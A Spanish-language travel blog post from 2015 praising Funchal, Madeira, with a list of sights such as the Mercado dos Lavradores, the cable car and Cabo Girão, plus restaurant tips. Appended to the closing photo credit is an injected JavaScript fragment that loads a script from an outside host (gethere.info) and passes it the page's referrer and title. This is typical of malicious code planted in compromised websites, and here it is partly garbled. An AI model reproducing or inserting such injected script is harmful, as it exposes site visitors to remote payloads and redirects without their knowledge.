Funchal en primera persona

12/05/2015

Madeira (3)

¿Os apetece una escapada a la República de Portugal? Si no conocéis el país todavía, ¡deberíais! Y, si ya lo conocéis, os gustará repetir. Concretamente hoy volamos hasta la encantadora isla de Madeira y una vez allí nos instalamos en su capital, Funchal.

Lo primero que tenéis que saber de Funchal es que es un destino apto para todas las edades. Su tranquilidad va de la mano de su ocio infinito, por lo que la convierten en una ciudad que conquista a cualquier tipo de público. Muchos podríais estar pensando que Funchal se limita a sol y poco más. Nada más lejos de la realidad. Le acompaña un clima mediterráneo, suave y benigno, que no destaca por valores extremos, ni en su época más calurosa, ni en su época más fría. Así, sus temperaturas suelen gustar a frioleros y calurosos. Antes de continuar, aclarar que Madeira en general no es destino de playa. Si buscas playas espectaculares hay otros destinos que se adaptan mejor a esa idea. Lo suyo aquí son los acantilados y los baños en el mar, pero no el plan de playa típico al que todos estamos acostumbrados.

Paisajes y calles os volverán locos. Su vegetación verde y tropical por igual la convierten en un marco incomparable mires hacia donde mires. Estampas dignas de foto que os cautivarán. Callejear en su zona centro es placentero e interesante. Calles con magia y estilo, repletas de tiendas, cafés, restaurantes, terrazas, pequeñas iglesias… Si a todo esto le sumamos la justificada y cierta fama de Portugal como país poco caro -sobre todo comparado con España- tendremos una combinación de factores de lo más atractiva, ¿acaso no?

Pues bien, aunque sois vosotros los que tenéis que descubrir la ciudad a partir de vuestras propias experiencias, os pasamos una lista de imprescindibles en Funchal, así como alguna que otra recomendación gastronómica. ¡Ya nos contaréis qué tal! 🙂

  • Mercado dos Lavradores. Tan típica como importante es esta visita. Alucinaréis con el colorido de sus frutas y vegetales.
  • Teleférico do Funchal. Vistas impactantes de la ciudad. Abstenerse los que padezcan vértigo.
  • Carros de cesto en Monte. Diversión y tradición en una actividad nunca antes vista.
  • Jardín Botánico. Flores y aves de todas las formas y colores. Sus pavos reales no tienen desperdicio.
  • Cámara de Lobos. Pueblo pesquero a tan solo 5 kilómetros de Funchal. Muy pintoresco.
  • Cabo Girão. No es de extrañar que este mirador tenga las mejores vistas de Funchal: está sobre el segundo acantilado más alto del mundo. ¡Cámaras preparadas!
  • Piscinas de Lido. Espectaculares piscinas públicas, una de agua salada, con acceso directo al mar para los forofos del océano.
  • Hamburgueria do mercado. Hamburguesas de carne, pollo, pescado, tofú… Francamente irresistibles.
  • Venda da Donna Maria. Restaurante de especialidades portuguesas y cocina casera en un local acogedor y lleno de encanto.

Foto | John6536s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;